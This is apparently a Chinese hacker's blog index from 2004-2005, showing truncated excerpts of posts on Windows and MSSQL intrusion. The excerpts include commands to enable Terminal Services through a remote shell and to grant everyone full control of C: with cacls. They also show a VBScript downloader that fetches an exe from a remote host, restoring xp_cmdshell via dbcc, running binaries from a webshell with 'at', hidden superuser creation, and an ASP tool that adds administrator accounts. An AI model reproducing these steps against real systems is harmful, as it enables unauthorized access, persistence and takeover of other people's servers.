Hack
Dcboy
dcboy@live.com<b>iamdcboy</b>
展开
-
如何建立隐藏的超级用户
前几天在某个网站看到了一篇介绍如何建立隐藏的超级用户的图文教程,给我了很大的启发,作者只说明了如何在本地图形界面下建立隐藏的超级用户,且作者说他无法在命令行下实现隐藏的超级用户的建立,于是我就开始自已摸索,刚开始时,我用reg.exe(3.0版)作为命令行下导出导入注册表文件的工具,但每次导入以后,建立的隐藏的超级用户总不能用,后来打开注册表查看,发现这个隐藏的超级用户的默认数据类型并没有被导入注原创 2004-10-10 13:54:00 · 1133 阅读 · 0 评论 -
Do All in Cmd Shell
目录1,前言2,文件传输3,系统配置4,网络配置5,软件安装6,Windows脚本7,附言前言Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。文件传输对于溢出漏洞获得的cmd shell,最大的问题就是如何上传文件。由于蠕虫病毒流行,连接ipc$所需要的139或44原创 2005-02-25 04:28:00 · 956 阅读 · 0 评论 -
asp查看系统用户和进程的代码
dim objon error resume nextfor each obj in getObject("WinNT://.")err.clear%>-->%>系统用户(组)系统进程else%>() next %>原创 2005-02-25 04:23:00 · 900 阅读 · 0 评论 -
SQL常用命令使用方法
1) 数据记录筛选: sql="select * from 数据表 where 字段名=字段值 order by 字段名 [desc]" sql="select * from 数据表 where 字段名 like %字段值% order by 字段名 [desc]" sql="select top 10 * from 数据表 where 字段名 order by 字段名 [desc]" sql="原创 2005-02-25 04:29:00 · 1276 阅读 · 0 评论 -
命令行安装终端服务
首先,telnet到该机器上面(具体怎么样上去不需要我说了吧),然后在命令行下输入如下三行命令: c:/>echo [Components] > c:/aa c:/>echo TSEnable = on >>c:/aa c:/>sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/aa /q /r原创 2005-01-30 23:59:00 · 1049 阅读 · 0 评论 -
更改目录权限
cacls.exe c: /E /T /G everyone:Fcacls.exe c: /E /T /G everyone:Fcacls.exe c: /E /T /G everyone:Fcacls.exe c: /E /T /G everyone:F原创 2005-01-04 05:48:00 · 975 阅读 · 0 评论 -
cmd下载文件方法
Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://www.xx.com/dc.exe",0 下载文件的地址xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open()原创 2004-12-30 19:28:00 · 6041 阅读 · 0 评论 -
当SA遇到XP_CMDSHELL时
有时候在入侵的时候总是碰到先烦恼的问题,比如SA遇到xp_cmdshell时,如果管理员把xp_cmdshell删了怎么办呢?总是眼看着肉鸡跑了吧!今天我就对XP_CMDSHELL做一先解释,希望大家能看明白,能看懂众所周知,在MSSQL中,通过XP_cmdshell存储扩展,拥护具有sysadmin权限,用来执行系统任意命令但是那先网管也不是吃素的,都回把它删除,所以在SQL Injection原创 2004-12-30 19:25:00 · 1544 阅读 · 0 评论 -
深入挖掘Windows脚本技术
得益于com技术的支持,WSH能提供比批处理(.bat)更强大的功能。说白了,wsh不过是调用现成的“控件”作为一个对象,用对象的属性和方法实现目的。 常用的对象有: WScript Windows脚本宿主对象模型的根对象,要使用WSH自然离不开它。它提供多个子对象,比如WScript.Arguments和WScript.Shell。前者提供对整个命令行参数集的访问,后者可以运行程序、操纵注册表内原创 2004-12-30 17:44:00 · 1030 阅读 · 0 评论 -
绿色开启终端的简单方法
今天介绍的这种开终端的方法,绿色,环保,无污染~~不须上传任何文件开启终端的方法适合win2k,xp,2003.本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~在无须传任何文件的情况下开启终端服务。 一、win 2k下终端开启终端首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:echo Windows Registry Ed原创 2004-12-29 02:55:00 · 827 阅读 · 0 评论 -
在webshell下安全执行EXE程序
有时候在WEBSHELL下面执行EXE程序常常会导致IIS崩溃有一种方法比较方便 首先查看系统时间time /T获得当前时间添加到at time xxx.exe用at命令查看任务是否被添加原创 2005-01-05 01:36:00 · 1899 阅读 · 0 评论 -
创建触发器
create trigger trig_notic_UIon notic for insert,updateasupdate notic set memo=memo+where id in(select id from inserted) go/*trig_notic_UI 触发器名称 自定义notic 需要触发的表名memo 需要更新的字段id 是主键*/原创 2005-01-01 15:55:00 · 1023 阅读 · 0 评论 -
突破TCP/IP筛选到3389终端登陆
一:得到webshell今天晚上的一次小小测试,由于本人太菜,再高深的技术我也不会,只能这样了..........一切都已经过去了,没有办法补图了,希望能看的懂这个小帖子。今天有是无聊的一天,晚上实在无聊没有事情干,就到一个视频聊天站点看秀,嘿嘿~突然发现一个聊天室特别的火暴,人数已经有500人在里面了(满员了),刷了n次也没有进去..........更加郁闷了!:(想想反正也是没有事情做,测试一原创 2004-12-29 03:07:00 · 1766 阅读 · 0 评论 -
蓝屏的原创添加超级用户的.asp代码
[转载]蓝屏的原创添加超级用户的.asp代码 凯文改进 Ms未公布的漏洞信息来源:冰点论坛作者:凯文 (kevin1986).network对象脚本权限提升漏洞利用工具用户:密码: if request.servervariables("REMOTE_ADDR") response.write "iP !s n0T RiGHt"else if request("username")原创 2004-12-26 14:48:00 · 882 阅读 · 0 评论 -
DISCUZ漏洞与提升权限
DISCUZ漏洞与提升权限这个漏洞是孟兄发现的,我在这里感谢他!也感谢ANGEL的分析!DISCUZ 2.2F的这个漏洞在register.php 的代码中:有如下代码: $email = trim($email); if(!$doublee && strstr($email, @)) { $emailadd = "OR email=$email";}原创 2004-12-17 16:30:00 · 6980 阅读 · 0 评论 -
扩展储存过程被删除以后可以有很简单的办法恢复
★Dbcc的一个用法扩展储存过程被删除以后可以有很简单的办法恢复:比如:删除DROP PROCEDURE sp_addextendedprocDROP PROCEDURE sp_OACreateexec sp_dropextendedproc xp_cmdshell恢复dbcc addextendedproc ("sp_OACreate","odsole70.dll")dbcc addexte原创 2004-12-08 15:15:00 · 880 阅读 · 0 评论 -
ASP中各种数据库连接代码
MS Access数据库连接 用DSN连接并且没有用户名和密码:set conn = Server.CreateObject("ADODB.Connection")conn.open "YourDSNName"%>用DSN连接并且有用户名和密码:set conn = Server.CreateObject("ADODB.Connection")conn.open "YourDSNNam原创 2004-11-16 19:41:00 · 1048 阅读 · 0 评论